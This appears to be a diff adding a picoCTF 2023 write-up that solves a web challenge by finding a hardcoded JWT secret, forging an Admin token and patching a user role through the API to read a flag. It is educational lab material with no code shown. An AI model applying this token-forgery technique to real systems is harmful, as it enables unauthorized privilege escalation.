|
| 1 | +# Java Code Analysis!?! # |
| 2 | + |
| 3 | +## Overview ## |
| 4 | + |
| 5 | +300 points |
| 6 | + |
| 7 | +Category: [Web Exploitation](../) |
| 8 | + |
| 9 | +Tags : `#picoCTF 2023` `Web Exploitation` |
| 10 | + |
| 11 | +## Description ## |
| 12 | + |
| 13 | +BookShelf Pico, my premium online book-reading service. |
| 14 | +I believe that my website is super secure. I challenge you to prove me wrong by reading the 'Flag' book! |
| 15 | + |
| 16 | +Additional details will be available after launching your challenge instance. |
| 17 | + |
| 18 | +## Solution ## |
| 19 | + |
| 20 | +After start of the instance picoCTF will provide you source code of the site and link to running instance. |
| 21 | + |
| 22 | +Site has login screen: |
| 23 | + |
| 24 | + |
| 25 | + |
| 26 | +And main screen with books. |
| 27 | + |
| 28 | + |
| 29 | + |
| 30 | + We can't access any of them except the first one. |
| 31 | + |
| 32 | +Let's dive into code. |
| 33 | + |
| 34 | +There are some files, that are interesting to us. |
| 35 | + |
| 36 | + |
| 37 | + |
| 38 | +Inside `JwtService.java` we can see all data, that JwtToken contain, the issuer and that `secretGenerator` gives the secret key. |
| 39 | + |
| 40 | + |
| 41 | + |
| 42 | +And inside the `SecretGenerator.Java` we see this. |
| 43 | + |
| 44 | + |
| 45 | + |
| 46 | +So, now we know, that "secret key" is `1234`. We have all the information to encode and decode JWT tokens. |
| 47 | + |
| 48 | +But we need a userId, so let's get back to the login screen. |
| 49 | + |
| 50 | +Now, I'm using `Google chrome` - press F12, open `Network` tab and login with creds from picoCTF: user:`user`, pass:`user` |
| 51 | + |
| 52 | +And we will get the JWT token for our user in the payload of the response: |
| 53 | + |
| 54 | + |
| 55 | + |
| 56 | +Copy it and go to the [this website](https://jwt.io/). Let's decode it like this: |
| 57 | + |
| 58 | + |
| 59 | + |
| 60 | +So, `userId` is `1`. |
| 61 | + |
| 62 | +Now let's encode out JWT token with role `Admin`: |
| 63 | + |
| 64 | + |
| 65 | + |
| 66 | +Inside `controllers` directory we can find `UserController.java`, where we can see this endpoint: |
| 67 | + |
| 68 | + |
| 69 | + |
| 70 | +Now I will use Postman (because I'm lazy) and send some requests with new JWT to update our role and read the flag. |
| 71 | + |
| 72 | +We need to create new user on the site, because we can't patch default user role. |
| 73 | + |
| 74 | +We need to obtain users list. |
| 75 | + |
| 76 | +First of all - put token into headers. |
| 77 | + |
| 78 | + |
| 79 | + |
| 80 | +Request: |
| 81 | + |
| 82 | + |
| 83 | + |
| 84 | +Out id is `6`. |
| 85 | + |
| 86 | +Now let's patch our role: |
| 87 | + |
| 88 | + |
| 89 | + |
| 90 | +Now we are `Admin` - just login and read the flag: |
| 91 | + |
| 92 | + |
| 93 | + |
| 94 | + |
0 commit comments